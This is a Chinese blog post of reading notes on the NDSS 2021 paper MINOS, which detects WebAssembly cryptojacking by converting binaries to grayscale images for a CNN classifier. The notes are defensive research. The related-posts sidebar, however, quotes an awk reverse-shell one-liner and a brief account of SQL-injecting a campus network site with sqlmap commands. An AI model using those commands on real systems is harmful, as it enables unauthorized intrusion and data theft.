论文阅读笔记-A Lightweight Real-Time Cryptojacking Detection System

已于 2023-02-27 16:08:00 修改
阅读量381 收藏 2
点赞数
分类专栏: 信息安全 文章标签: 论文阅读
于 2021-07-05 21:12:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43199509/article/details/118498768
版权

NDSS
MINOS*: A Lightweight Real-Time Cryptojacking Detection System
链接https://www.ndss-symposium.org/wp-content/uploads/ndss2021_4C-4_24444_paper.pdf
总的来说,是因为挖矿类恶意软件因为POW等机制,需要通过相同的哈希算法来实现统一的POW方案,因此提取恶意软件的代码进行灰度图化后相似度很高,通过这种方法来识别恶意挖矿软件。

附:什么是POW和POS,二者区别联系
来自百度知道https://zhidao.baidu.com/question/1928266543411253787.html
区别是:

1、POW机制:工作量证明机制即对于工作量的证明,是生成要加入到区块链中的一笔新的交易信息(即新区块)时必须满足的要求。在基于工作量证明机制构建的区块链网络中,节点通过计算随机哈希散列的数值解争夺记账权,求得正确的数值解以生成区块的能力是节点算力的具体表现。

2、POS机制:权益证明要求证明人提供一定数量加密货币的所有权即可。权益证明机制的运作方式是,当创造一个新区块时,矿工需要创建一个“币权”交易,交易会按照预先设定的比例把一些币发送给矿工本身。权益证明机制根据每个节点拥有代币的比例和时间,依据算法等比例地降低节点的挖矿难度,从而加快了寻找随机数的速度。

第一章
1.作者指出先存挖矿类恶意软件,劫持受害者的计算资源用于挖矿等用途
2.文中提到现存针对这种挖矿软件的常用方法,是针对miner、coin、Coinhive等常用关键字来做黑名单过滤,或是使用动态分析,通过提取内存和网络流量特征来识别这些恶意软件,但是这么做的缺点是开销较大,且依然存在误报
3.作者提出的方法是通过将Wasm(WebAssembly) 二进制文件转化为灰度图像,然后通过卷积神经网络来识别

第二章
1.文中介绍了Wasm, 这是一种低级的二进制指令格式,可以在Google Chrome 、 Mozilla Firefox 、 Microsoft Edge 和 Safari上运行。恶意软件作者用 C/C++ 编写代码来执行挖矿功能,使用 Emscripten 工具将其编译为 Wasm 模块。然后通过 JavaScript 函数调用Wasm 模块
在这里插入图片描述
2.文中给出了一段灰度图化的样例,WASM模块分为12个主要部分
第三章
在这里插入图片描述
第三章
1.文中提到现有检测挖矿程序的方法主要分为三类,基于浏览器的检测,基于主机的检测(针对在主机上作为恶意软件运行的独立恶意挖矿软件),以及基于网络的检测
2.文中指出现阶段挖矿软件的重心从JavaScript 转移到了WebAssembly,而之前的研究没有考虑到这种变化
3. 基于浏览器的挖矿检测,使用哈希和堆栈操作所花费的时间作为特征,或是记录特定指令的运行次数作为特征,使用cpu,内存变化及网络流量作为特征。
基于主机的挖矿检测,使用Windows PE文件的操作码序列和系统调用顺序作为特征,或是使用静态特征(即熵、header、section和 函数信息)和API调用相结合来识别
基于网络的检测,通过靠 Apache Spark Streaming 库和增量 ML 模型来识别挖矿流量

第四章
1.作者指出现阶段恶意挖矿软件会通过混淆字符串和函数名称来隐藏自己
2. 作者给出了一种识别流程,Wasm 二进制自动收集器将 Wasm 二进制文件下载到指定文件夹。 然后预处理器将二进制文件转换为灰度图像并将它们提供给 Wasm 分类器。 Wasm 分类器中预先训练的 CNN 将每个二进制文件的图像分类为恶意或良性。最后,通知程序接收分类结果并在结果表明存在恶意挖掘活动时提醒用户。
在这里插入图片描述
第五章
1.作者指出挖矿类恶意软件受到POW机制的限制,需要通过相同的哈希算法来实现统一的POW方案,作者通过灰度图化举例说明这些挖矿类恶意软件具有相似性,第一行是恶意挖矿软件,第二行是用于游戏或者其他的良性软件
在这里插入图片描述
2.分类器是CNN,样本包括150个良性WASM文件和150个恶意WASM文件,由 3 组卷积层组成,然后是最大池层,每个连续的卷积层(16、32 和 64)中的滤波器数量不断增加。每个卷积层使用的内核大小设置为(3,3),而每个最大池层的池大小设置为(2,2)

第六章
1.作者提到了具体灰度图化的方法,Wasm 模块二进制由一系列十六进制数字组成。这个十 六进制值向量可以修改并转换为灰度图像。为方便这样的转换,首先将 Wasm 二进制转换为 8 位无符号整 数向量 (uint8),然后重新整形为二维数组。然后将这个 重新整形的数组除以 255 以将每个整数表示为一个像素, 该像素的值范围为 0 到 255(0 为黑色,255 为白色),伪代码如下
在这里插入图片描述
第 15-16 行对创建的数 组进行整形,并将其转换为值范围从 0 到 255 的 8 位 无符号整数数组 (uint8)。数组中每个整数的值代表像素 的亮度,范围从黑色到白色(0 到 255)。在第 17-18 行,图像数组的大小被调整为 100 x 100 的常见大小, 并且像素值通过将数组除以 255 被归一化到 0 到 1 的 范围内。进行这种归一化是因为它更容易模型来处理具有 较小范围值的输入数组。第 19 行将数组重塑为 CNN 可 以接受的四维数组作为输入
2.使用 RMSprop 优化器,学习倍率0.0001,50个epcho。这个优化器在参数空间更为平缓的方向,会取得更大的进步(因为平缓,所以历史梯度平方和较小,对应学习下降的幅度较小),并且能够使得陡峭的方向变得平缓,从而加快训练速度
3.数据集来源有VirusTotal,NoCoin(Chrome、Firefox 和 Opera 上可用的浏览器扩展,旨在使用黑名单阻止挖矿),MadeWithWasm(展示 使用 WebAssembly 的应用程序、项目和网站的网站)

梦想闹钟
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
利用AI+大数据的方式分析恶意样本(二十七)
至臻求学,胸怀云月
07-11 2328
NDSS2021一篇挖矿二进制检测的文章阅读
深度学习论文: LEDnet: A lightweight encoder-decoder network for real-time semantic segmentation及其PyTorch实现
mingo_敏
07-01 1315
深度学习论文: LEDnet: A lightweight encoder-decoder network for real-time semantic segmentation及其PyTorch实现 LEDnet: A lightweight encoder-decoder network for real-time semantic segmentation PDF:https://arxiv.org/pdf/1905.02423.pdf PyTorch: https://github.com/shan
NDSS 2021 论文泛读
^_^
10-22 1万+
会议论文列表:https://dblp.uni-trier.de/db/conf/ndss/ndss2021.html 只挑了几个感兴趣的session过了一遍,还是发现了不少有意思的文章。 文章目录程序分析模糊测试侧信道智能家居软件防御嵌入式安全可信计算 程序分析 Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages. 简介:qualitative assessment!(定性评估) 包管理
基于wasm的探索与研究(一)
weixin_41914013的博客
11-30 2487
基于wasm的探索与研究(一)WebAssembly初探 本次分享的文章是基于WebAssembly的探索与研究。由于最近一直在做加密相关的项目,有想法把高级语言实现的加密工具运行在浏览器中,恰好WebAssembly是为了一个可移植的目标而设计的,正好满足需求,顺便测试下通过WebAssembly编译后的加密工具性能。当然在研究WebAssembly的时候也遇到了各种问题,后面会和大家一起分享。这篇文章主要了解WebAssembly,以及WebAssembly基本使用方法。 概述 WebAssembly
计算机视觉论文-2021-11-02
中科院AI算法工程师的博客
11-03 8355
本专栏是计算机视觉方向论文收集积累,时间:2021年9月15日,来源:paper digest 欢迎关注原创公众号【计算机视觉联盟】,回复【西瓜书手推笔记】可获取我的机器学习纯手推笔记! 直达笔记地址:机器学习手推笔记(GitHub地址) 标题:天文学中深度学习算法的鲁棒性——星系形态学研究 作者:阿依普里亚诺维奇等。 类别: 天体 ph.GA [天文 ph.加, cs.简历, cs.LG | 亮点:深度学习模型正越来越多地被广泛应用于科学领域,特别是处理高维和大量的科学数据。 标题:基...
论文阅读笔记】NeurIPS2020文章列表Part1
热门推荐
zincrain的博客
12-09 2万+
A graph similarity for deep learning An Unsupervised Information-Theoretic Perceptual Quality Metric Self-Supervised MultiModal Versatile Networks Benchmarking Deep Inverse Models over time, and the Neural-Adjoint method Off-Policy Evaluation and Learning.
CV综述图像分割整理---目录
weixin_42466194的博客
12-02 1456
CV综述图像分割整理---目录instance SegmentationmaskrcnnyolactDeep SnakeCenterMaskcentermask-lite :real timeSOLO/SOLOV2semantic SegmentationObject detectionyolo系列yolov1yolov2yolov3yolov3-tinyPOLY YOLOPoly-YOLO Liteyolov4yolov4-tiny链接: [link](https://www.csdn.net/).yo
IT英语4-计算机英语缩写术语
weixin_30394633的博客
04-20 7739
IT英语4-计算机英语缩写术语 1、CPU3DNow!(3D no waiting,无须等待的3D处理)AAM(AMD Analyst Meeting,AMD分析家会议)ABP(Advanced Branch Prediction,高级分支预测)ACG(Aggressive Clock Gating,主动时钟选择)AIS(Alternate Instruction Set,交...
elasticsearch reference 2.3 学习笔记
Deep in ElasticSearch
09-20 6775
Elasticsearch is a highly scalable open-source full-text search and analytics engine. It allows you to store, search, and analyze big volumes of data quickly and in near real time.
基于wasm的探索与研究(三)
weixin_41914013的博客
12-12 1725
wasmer运行时 上一篇文章分享了基于wasm的openssl实践,讲述了openssl的MD5算法如何在浏览器中执行。在探索过程中发现了openssl是可以通过wasm编译后直接run,并且有自己的runtime,这是因为openssl.wasm是通过wasmer编译运行的,这一篇文章分享制作具有运行时的openssl.wasm 概述 Wasmer介绍 Openssl编译到WASM 总结 一、Wasmer介绍 Wasmer是一个用于在服务器上执行WebAssembly的开源运行时。支持基于WebAs
[WASM] Write to WebAssembly Memory from JavaScript
weixin_34192732的博客
06-30 230
We write a function that converts a string to lowercase in WebAssembly, demonstrating how to set the input string from JavaScript. WASM Fiddle: https://wasdk.github.io/WasmFiddle/?h1s69 Demo Repo: h...
读研整活笔记(3):阅读论文 WANA Symbolic Execution of Wasm Bytecode...
weixin_43295763的博客
08-20 1319
读研整活笔记2:调研编译器soll需求理解0.摘要0.标题1.摘要2.关键词3.个人理解一.介绍1.摘要二.WASM和智能合约的背景2.1.WASM2.2.EOSIO智能合约2.3.以太坊智能合约三.智能合约漏洞3.1 EOSIO智能合约漏洞3.1.1 Fake EOS Transfer 需求理解 书接上回,上回我们整活调研了编译器soll,这回我们要开始阅读论文啦。要求如下: 最近会让你读一下上级学长的论文,开始读代码 后面会让你做wasm字节码的符号执行和漏洞检测 你先对着论文,读读这个代码,尝试跑跑
【目标检测】16、Pelee: A Real-Time Object Detection System on Mobile Devices
呆呆的猫的博客
04-17 2916
摘要 目前在计算能力和内存资源有限的移动设备上运行卷积神经网络模型的需求越来越大,这样一来就刺激了对高效模型的设计和研究。 MobileNet、ShuffleNet和MobileNetV2等高效的网络结构,然而这些模型高度依赖于深度可分离卷积网络,在很多深度学习框架中难以实施。 基于此,本文提出了一种有效的结构,名为PeleeNet,使用传统的卷积网络。 在ImageNet ILSVRC 201.........
反弹shell失败 原来是这个原因
梦想闹钟
08-31 6744
在学习反弹shell的相关知识时,尝试在kali2上使用反弹shell 提示没有/dev/tcp 这是怎么回事呢?我百度了一下,大部分的说法是这个目录是bash创建的一个虚拟目录,但还是没有解决问题,最后在谷歌上找到了解释 https://evilpan.com/2021/04/25/reverse-shell/ 因此还是使用awk命令一句话反弹shell awk 'BEGIN {s = "/inet/tcp/0/127.0.0.1/8080"; while(42) { do{ printf "shell
记一次校园网渗透经历
梦想闹钟
08-13 3008
首先注入点是这里,其实原来右边是没有这个通知公告的,加了以后就加出问题来了,这个其实是一个用于登录校园网wifi的网站 网址http://***/index.php/index/notice/id/1 点进去是一个上网须知 怀疑id/1中 1为注入点,上sqlmap!! sqlmap -u “http://**/index.php/index/notice/id/” --level 3 跑出来发现是一个注入点 然后接下来 --dbs 得到库名后用-D radius --tables看下表,这时候已经
tensorflow 拼接不同的神经网络结构
梦想闹钟
09-23 2039
最近尝试了将两个网络组合,下面的代码是将cnn和mlp网络进行组合的示例,输入CNN网络的特征维度是n40000,将其转化为n(200200)的维度输入到cnn网络中,卷积过后再和维度为n2500的特征结合,输入到mlp网络里去,最终输出是对应10分类的概率,关键是使用 layers.concatenate将不同网络的输出拼接起来,作为新网络的输入。同时,使用多个网络和多个输入时也需要提前声明多个Input层,以及model里的输入格式models.Model(inputs=[input1, input2]
A lightweight convolutional neural network for disease detection of fruit leaves
最新发布
04-13
Sure, there are many lightweight convolutional neural networks (CNNs) that can be used for fruit leaf disease detection. One popular option is MobileNet, which can provide good classification accuracy...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值